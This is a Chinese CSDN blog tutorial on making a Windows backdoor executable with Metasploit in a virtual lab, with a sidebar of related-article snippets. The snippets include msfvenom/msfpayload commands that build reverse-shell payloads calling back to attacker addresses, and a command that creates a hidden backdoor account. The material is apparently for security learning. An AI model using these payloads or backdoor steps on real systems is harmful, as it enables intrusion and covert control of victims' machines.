MSF --Windows系统后门之exe文件

最新推荐文章于 2024-05-30 14:18:45 发布
最新推荐文章于 2024-05-30 14:18:45 发布
阅读量1.8k 收藏 2
点赞数 2
分类专栏: # MetaSploit 文章标签: metasploit MSF windows攻击 windows后门
学习之路长且漫,长情与君总会见!
本文链接:https://blog.csdn.net/Aaron_Miller/article/details/105807666
版权

文章目录

以下所有的内容仅供网安学习参考,非法攻击他人计算机应后果给予法律制裁!!!

一、环境

  • Windows 2008 R2(虚拟机,受害者,192.168.7.131)
  • Kali(虚拟机,攻击者,192.168.7.129)

二、操作

2.1 攻击者操作

目的:给windows账户留个后门,这里未提供免杀操作

》》前提MSF能够ping通目标主机,这里对Win2008R2关闭防火墙
在这里插入图片描述
在这里插入图片描述
》》msfvenom生成可执行exe文件
在这里插入图片描述
》》启动MSF
在这里插入图片描述
》》执行
在这里插入图片描述
》》等待受害者执行文件操作(客户进行了双击exe文件)
》》获得了shell
在这里插入图片描述

2.2 受害者操作

》》意外的点击了exe文件

風月长情
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 2
    评论
专栏目录
高级java笔试题-2019-Read-article:2019年网上阅读过的文章记录
06-03
从开始到初始访问,包括域名创建,制作网络钓鱼内容,绕过垃圾邮件过滤器和电子邮件网关的注意事项,生成无法检测的有效负载以及绕过Windows保护 内网渗透文章,其中涉及到一些较新的工具使用。 各类命令、备忘录 ...
第六十四课:高级持续渗透-第八季demo便是远控1
08-03
4. **远控四要素**:一个有效的远控后门需要具备执行命令、管理文件系统、监控摄像头、操纵注册表和服务等功能。实现这些功能通常需要大量代码,可能导致后门过于复杂,不符合实战需求。 5. **“后门中间件”**:...
msf上制作简单的windows exe木马
weixin_73942557的博客
10-25 754
msf制作Windows执行程序木马并利用。首先利用用组件msfvenom制作木马。然后将生成的木马放到你准备的靶机上面。设置payload、监听IP和端口。在靶机上运行生成的木马文件。进入msfconsole。-p设置payload。然后设置返回IP和端口。-f设置生成木马的类型。使用exploit利用。-o设置路径和文件名。目前就已经提权成功了。
msf生成payload并注入到可执行程序exe
redwand的博客
07-22 5112
msfconsole下的generate与msfvomen命令实际是不同环境下的同一个命令,其功能基本相同,这里我们要学习的重点是使用-k -x 选项将payload注入到可以执行文件exe中,这项技能在实战中后渗透测试的可持久化中经常会被用到。
msf攻击windows实例
最新发布
qq_52712762的博客
05-30 1525
环境:攻击机kali(192.168.129.139),目标机windows10(192.168.129.132)方法一:通过web站点,使用无文件的方式攻击利用执行(命令执行漏洞)方法二:通过web站点,上传webshel,返回给msfmsfvenom)方法三:攻击其他端口服务,拿到meterpreter(445)
vb6.0 生成exe被简称是木马_使用MSF渗透框架生成PHP木马并实现控制远程服务器
weixin_39805387的博客
12-06 299
一、背景介绍Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSFMetasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?接下来让我们一起学习!二、资源装备1.安装好...
BT5 msf msfpayload生成2进制 msf生成exe meterpreter监听
weixin_30708329的博客
10-15 108
BT5 msf msfpayload生成2进制 msf生成exemsfpayload windows/meterpreter/reverse_tcp LHOST=192.168.85.147 LPORT=4444 X >/root/Desktop/mt.exe其它脚本msfpayload java/jsp_shell_reverse_tcp LHOST=58.60.195.226 LPOR...
windows操作系统后门
m0_68353775的博客
10-04 691
影子账户   创建隐藏账户的方式: 创建一个隐藏账户"net user test$ password /add",隐藏账户无法使用"net user"命令查看,但是可以在"本地用户和组"里面查看。 打开注册表"HKEY_LOCAL_MACHINE/SAM/SAM/Domains/Account/Users/Names"找到创建的隐藏账户(test$),在这个注册表里面可以看见test$账户的类型,同样可以查看计算机Administr
Metasploit执行后门.doc
06-25
接下来的命令展示了如何使用`msfvenom`生成Windows执行文件(.exe后门。`msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=5.5.5.1 LPORT=1111 > https.exe`,这里生成了一个使用HTTPS协议的...
利用Metasploit进行Linux提权
01-09
Metasploit 拥有msfpayload 和msfencode 这两个工具,这两个工具不但可以生成exe后门,一可以生成网页脚本类型的webshell ,通过生成webshell 然后设置监听器,访问webshell的url,幸运的话可以产生一个session,...
MSF生成一个木马与使用
lx1315998513的博客
03-27 1万+
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用测试机打开,攻击成功后,就渗透到了靶机系统中。 准备: 目标:win7 x64专业版 攻击主机:Kali IP:192.168.1.143 生成: 生成test.exe木马文件 Step1:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1...
MSF-02-木马捆绑
purvispanwu的博客
08-09 1098
木马捆绑
Windows后门--教程(二)——Windows计划任务后门
W小哥
03-15 4476
一、Windows计划任务后门介绍 计划任务是经常被攻击者拿来利用的控制点,计划任务可以让目标主机在特定的时间执行我们预先准备的后门程序从而帮助我们进行权限维持。 二、Windows计划任务后门-教程 前提条件: 假设在攻击的过程中通过利用各种getshell,已经拿到目标服务器administrator权限 环境: windows Server2012 IP: 192.168.226.128 2.1 利用MSF生成一个EXE类型的后门木马 2.2 创建计划任务 2.3 监听返回的shell 三、Win
MSF生成木马及木马的简单使用
爱喝水的仙人树的博客
11-03 8834
本文将介绍有关MSF木马模块的简单使用方式,介绍常见的几种木马生成方式,如有不对的地方,欢迎大家在评论区指正。由于本文仅对部分模块的简单使用进行说明,更多信息请参考官方网址MSFVENOM环境配置说明1. 使用kali虚拟机和Win7(可以低于此版本)虚拟机2. kali虚拟机建议使用最新版本并将系统软件更新至最新版本3. Win7虚拟机务必关闭网络防火墙,不建议使用Win7及以上版本系统,简单的木马会被直接删除4. 查看两台虚拟机的IP地址,确保两台虚拟机之间可以ping通。
kali学习4——使用msfvenom制作exe木马
不会心跳的博客
01-29 5606
使用msfvenom制作exe木马文件 1. msfvenom msfvenom是msfpayload,msfencode的结合体。使用msfvenom制作木马的思路是,木马在目标机上执行后,向本机发送信息,而本机则需要开启监听状态,收到信息后则进行连接。 2. 制作木马 msfvenom制作木马需要的参数很多: root@kali:~# msfvenom -h MsfVenom - a Metasploit standalone payload generator. Also a replacement
Metasploit小技巧
weixin_30443813的博客
08-07 288
meterpreter >进入meterpreter之后即可进行一些相关木马操作了,下面是正式本章内容首先可以查看帮助文档,命令“help”,挑常用操作来讲↓↓↓------------------------------------------------------------------------------------------------用户操作:Stdapi: User i...
MSF生成windows木马
热门推荐
lenkee的博客
10-22 1万+
msfvenom是msfpayload,msfencode的结合体,它的优点是单一,命令行,和效率.利用msfvenom生成木马程序,并在目标机上执行,在本地监听上线 生成exe木马 msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 -f exe -o 123.exe 192.168.0.110是攻...
利用MSF渗透windows系统windows数据库,linux系统实验
Cwillchris的博客
10-18 1635
实验环境: kali:172.16.12.30 windows靶机:172.16.12.4 用户名:administrator 密码:vgrant centos靶机:172.16.12.11 用户名:root 密码:123 实验步骤: 一、攻击LINUX服务器 1、扫描目标机获取哪些服务和端口开启 ┌──(root????kali)-[~/desktop] └─# msfdb run msf6 > db_nmap -A -v 172.16.12.4 查看目标器服务列表
msf之ms12-020的复现
05-24
MSFMetasploit框架)是一个开源的漏洞利用工具,可以用来测试和利用此漏洞。 以下是利用MS12-020漏洞的步骤: 1. 首先,需要使用Metasploit框架。如果你还没有安装它,请先到官网下载并安装。 2. 打开...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

風月长情

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值